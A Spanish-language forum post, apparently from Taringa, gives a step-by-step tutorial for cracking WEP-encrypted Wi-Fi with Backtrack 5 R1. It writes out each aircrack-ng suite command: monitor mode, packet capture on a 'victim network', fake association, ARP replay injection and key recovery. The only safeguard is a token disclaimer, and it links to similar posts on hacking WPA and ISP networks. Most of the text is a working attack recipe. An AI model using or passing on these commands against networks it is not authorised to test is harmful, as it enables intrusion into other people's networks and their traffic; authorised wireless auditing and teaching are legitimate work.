.Qué Onda Compas de T¡ Aqui otra vez con un Tutorial para hacer auditoría de Redes inalámbricas con cifrado wep en 5 minutos más o menos; usando Backtrack 5 R1 Gnome.

"Este Post es con Fines Educativos y/o Didácticos, No me Hago Responsable del Uso Malicioso"
Hackear Redes Inalámbricas wep con Backtrack 5 R1


Bueno cómo dice el Pollo: "Vamos al Grano"


*Lo Primero es saber el nombre de nuestra interface (Targeta Wireless) para ponerla en Modo Monitor, para esto abrimos una Terminal y escribimos lo siguiente:

airmon-ng

Y nos aparecerá el nombre de nuestra interfaz, el chipset y el driver en mi caso es una el
nombre de la interfaz es Wlan0


1* Ya qué conocemos el nombre de nuestra interfaz procedemos a ponerla en Modo Monitor y escribimos lo siguiente:

airmon-ng start wlan0

Ya tenemos nuestra targeta en Modo Monitor (monitor mode enabled on mon0) y como se podrán dar cuenta "mon0" es el nombre de la interfaz en modo monitor.


2* Ahora vamos a escanear redes disponibles con el siguiente comando:

airodump-ng mon0

y con esto comenzará a mostrarnos las Redes Disponibles. Para seleccionar la Red Víctima tenemos qué detener el escaneo presionando ctrl+c


3* En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando:

airodump-ng -w redes -c 11 --bssid
00:22:A4:30E:59 mon0

donde

    -w = especifica el nombre del archivo donde se guarda la captura de datos
    -c = especifica el canal de la Red
--bssid = especifica Mac de Punto de Acceso
 mon0 = especifica la interfaz de la targeta de Red en Modo Monitor


4* Abrimos una segunda Terminal (sin cerrar la primera) y escribimos lo siguiente:

aireplay-ng -1 0 -a
00:22:A4:30E:59 mon0

esto es para Asociar su pc con la Red Víctima


5* Ahora si viene lo bueno, a inyectar paquetes a la red, para esto tecleamos lo siguiente:

aireplay-ng -3 -b 00:22:A4:30E:59 mon0

con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se incrementará rapidamente, y esperamos a que llegue a los 30,000 datos para poder desemcriptar la Clave


6* Cuando llegue a los 30,000 datos abrimos una tercera y última Terminal y escribimos el famoso comando:

aircrack-ng redes-01.cap


redes = archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 3*


damos enter y empezará a decifrar a la clave y Vualá Clave desemcriptada


Key Found¡ (09:86:23:47:63)


Y en dado caso de qué no entiendan ni un carajo¡ ahi les dejo un Video para qué vean de que Lado masca La Iguana.





link: http://www.youtube.com/watch?v=IKDJrl6ollM

Eso es todo por esta vez, ya saben si les Gustó el Post comenten, agréguenlo a Favoritos, siganme los buenos y no me caerían mal unos Puntos


Viva México, Viva Backtrack y Viva el Software Libre 


Ya saben compas¡ si tienen dudas sobre auditoria de redes, no duden en echarme un grito por mensaje privado.

¡Suerte, todo depende de ustedes!

Visita mis demás Post:

Hackear redes wifi con Beini:

http://www.taringa.net/posts/downloads/12874088/Hackear-Redes-wifi-Infinitum-y-Cablevision-con-Beini.html

Hackear Claves wpa con Backtrack 5 R1:

http://www.taringa.net/posts/linux/13372125/Hackear-Claves-wpa-con-Backtrack-5-R1-Revolution.html



       Hackear                           Ubuntu